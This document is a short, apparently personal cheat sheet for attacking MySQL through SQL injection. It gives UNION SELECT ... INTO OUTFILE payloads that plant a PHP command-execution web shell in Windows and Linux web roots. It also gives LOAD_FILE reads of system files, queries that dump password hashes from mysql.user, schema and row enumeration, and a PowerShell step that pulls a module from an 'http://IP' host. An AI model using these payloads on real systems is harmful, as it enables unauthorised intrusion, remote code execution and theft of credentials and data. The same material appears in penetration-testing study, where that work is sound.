sqli mysql

Checks for UDF (if root on mysql)

# checking if database has been misconfigured to allow insecure handling of files.
SHOW VARIABLES LIKE "secure_file_priv";

# where udf files are loaded from
@@plugin_dir;
SHOW VARIABLES LIKE 'plugin_dir';

# show all vars
SHOW variables;

# show PERMS
SHOW Grants;

SQLi shell

# windows
?id=1 union all select 1,2,"<?php echo system($_GET['cmd']);?>",4 into OUTFILE 'c:/xampp/htdocs/cmd.php'

# linux
?id=1 union all select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4 into OUTFILE '/var/www/html/cmd.php'
# try: "<?php echo exec($_GET["cmd"]);"
# try: replace "php-payload" with (php-payload)

my-sql commands

# comments
#
--
/* <blah> */

# concatenation
# 0x3a separates the field with a ':'
concat(col_1,col_2)
concat(col_1,0x3a,col_2)
concat(0x28,col_1,0x3a,col_2,0x29)
col_1|| '~' || col_2

# hostname
@@hostname

# data directory
@@datadir

# version
@@version
version()

# read-file
# C:\Windows\System32\Drivers\etc\hosts
# C:\\Windows\\System32\\Drivers\\etc\\hosts
LOAD_FILE('<file>')
TO_BASE64(LOAD_FILE('<file>'))

# users
user()
system_user()
| SELECT user FROM mysql.user

# password (md5)
# TO_BASE64(password)
| SELECT password FROM mysql.user

# databases
database()
| SELECT schema_name FROM information_schema.schemata;

# tables
SELECT table_name FROM information_schema.tables WHERE table_schema='<db>'
# can use WHERE table_schema IN (0x<table-in-hex>, 0x<table-in-hex>)

# cols
SELECT column_name FROM information_schema.columns WHERE table_name='<table>'
describe [<db>.]<table>

# nth row
# to get total-rows
SELECT count(*) FROM <table>
# enumerate incrementally
SELECT <col> FROM <table> LIMIT <n>,1
SELECT <col> FROM <table> LIMIT 1 OFFSET <n>

mysql w/ powershell

• mcpmag.com/querying-mysql-databases.aspx/

• known bug fix: adamtheautomator.com/powershell-get-credential/#Create_a_Credential_without_a_Prompt

wget https://github.com/adbertram/MySQL/archive/master.zip -O MySQL.zip

# setup
Invoke-WebRequest  -Uri http://IP/MySQL.zip -OutFile 'C:\MySQL.zip'

$modulesFolder = 'C:\Program Files\WindowsPowerShell\Modules'
Expand-Archive -Path C:\MySql.zip -DestinationPath $modulesFolder
Rename-Item -Path "$modulesFolder\MySql-master" -NewName MySQL

# usage
$user = '<user>'
$password = ConvertTo-SecureString '<password>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($user, $password)

Connect-MySqlServer -Credential $credential -ComputerName 'localhost' -Database "<db>"
Invoke-MySqlQuery  -Query "select @@version;"

Error based

• perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/